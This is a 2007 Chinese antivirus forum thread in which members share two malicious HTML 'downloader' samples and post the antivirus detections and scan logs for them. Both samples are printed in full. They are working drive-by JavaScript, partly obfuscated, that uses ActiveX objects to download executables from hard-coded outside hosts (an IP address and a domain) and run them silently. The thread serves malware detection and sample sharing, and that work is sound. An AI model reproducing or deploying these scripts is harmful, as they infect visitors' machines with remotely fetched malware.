两个HTML下载器[041741] [B0E02A]

显示全部楼层 · 发表于 2007-9-27 18:17:35

大家扫扫前请到
http://dm.tgbus.com/2007/
此处选美大会帮夏娜投张票吧，否则会影响杀软的查杀效果，谢谢！！9点前哦

显示全部楼层 · 发表于 2007-9-27 18:22:21

041741.htm(样本目前链接不上）

<script language=javascript>
function gn(n)
{
var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';
}
try
{ aaa="ob";
bbb="je";
yyy="ct";
ccc="Adodb.";
ddd="Stream";
eee="Microsoft.";
fff="XMLHTTP";
ggg="o";
kkk="p";
mmm="e";
sss="n";
lj='http://61.152.169.234/flash.exe';
var df=document.createElement(aaa+bbb+yyy);
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject(eee+fff,"");
var S=df.CreateObject(ccc+ddd,"");
S.type=1;
x.open("GET", lj,0);
x.send();
mz1=gn(10000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1);
S.Open();
ttt=x.responseBody;
S.Write(ttt);
S.SaveToFile(mz1,2); S.Close();
var Q=df.CreateObject("Shell.Application","");
exp1=F.BuildPath(tmp+'\\system32','cmd.exe');
Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0);
} catch(i) { i=1; }
</script>

复制代码

[ 本帖最后由 promised 于 2007-9-27 18:23 编辑 ]

显示全部楼层 · 发表于 2007-9-27 18:23:55

Trojan.DL.JS.Agent.lgc

显示全部楼层 · 发表于 2007-9-27 18:24:36

这个样本也连不上

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>MS</title>
</head><body>
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="JavaScript">
<!--
document.writeln("<script>var ailian,zhan;ailian="http://w.dzy520.com/0.exe";zhan="Microsoft.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var chenzi=1;var fan=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var china=ado.createobject(ln+lzn+an,"");var h=1;fan.Open("GET",ailian,0);fan.Send();china.type=1;var n=1;china.open();china.write(fan.responseBody);china.savetofile(zhan,2);china.close();var chinahks=ado.createobject("ShelL.Application","");chinahks.ShelLexecute(zhan,"","","open",0);}catch(chenzi){};</script\>");
//-->
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
</body></html>

复制代码

[ 本帖最后由 promised 于 2007-9-27 18:25 编辑 ]

显示全部楼层 · 发表于 2007-9-27 18:25:24

病毒: Trojan-Downloader.JS.Psyme.ij, Trojan-Downloader.JS.Psyme.hl
文件: 041741[1].rar
目录: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\AW9V89LH
进程: Maxthon.exe

显示全部楼层 · 发表于 2007-9-27 19:10:06

deleted: Trojan program Trojan-Downloader.JS.Psyme.ij File: C:\Documents and Settings\Owner\×ÀÃæ\041741.rar/041741.htm
deleted: Trojan program Trojan-Downloader.JS.Psyme.hl File: C:\Documents and Settings\Owner\×ÀÃæ\041741.rar/B0E02A.htm

显示全部楼层 · 发表于 2007-9-27 19:50:37

[ 本帖最后由 Kav6.0 于 2007-9-27 19:52 编辑 ]

显示全部楼层 · 发表于 2007-9-27 22:41:05

Starting the file scan:

Begin scan in 'C:\Users\morgan\Documents\041741.rar'
C:\Users\morgan\Documents\
  041741.rar
[0] Archive type: RAR
--> 041741.htm
      [DETECTION] Contains detection pattern of the HTML script virus HTML/Dldr.Agen.1908
      [WARNING] Infected files in archives cannot be repaired!
--> B0E02A.htm
      [DETECTION] Contains detection pattern of the VBS script virus VBS/Dldr.Psyme.GV
      [WARNING] Infected files in archives cannot be repaired!
      [WARNING] The file was ignored!

显示全部楼层 · 发表于 2007-9-28 07:48:28

2007-9-28 7:48:00 1190936880 Administrator 2260 Sign of "VBS:Malware [Script]" has been found in "C:\Documents and Settings\Administrator\桌面\041741.rar\041741.htm" file.

显示全部楼层 · 发表于 2007-9-28 09:55:27

已删除：木马程序 Trojan-Downloader.JS.Psyme.ij 文件: F:\9.28\041741.rar/041741.htm
已删除：木马程序 Trojan-Downloader.JS.Psyme.hl 文件: F:\9.28\041741.rar/B0E02A.htm

[病毒样本] 两个HTML下载器[041741] [B0E02A]

本帖子中包含更多资源

本帖子中包含更多资源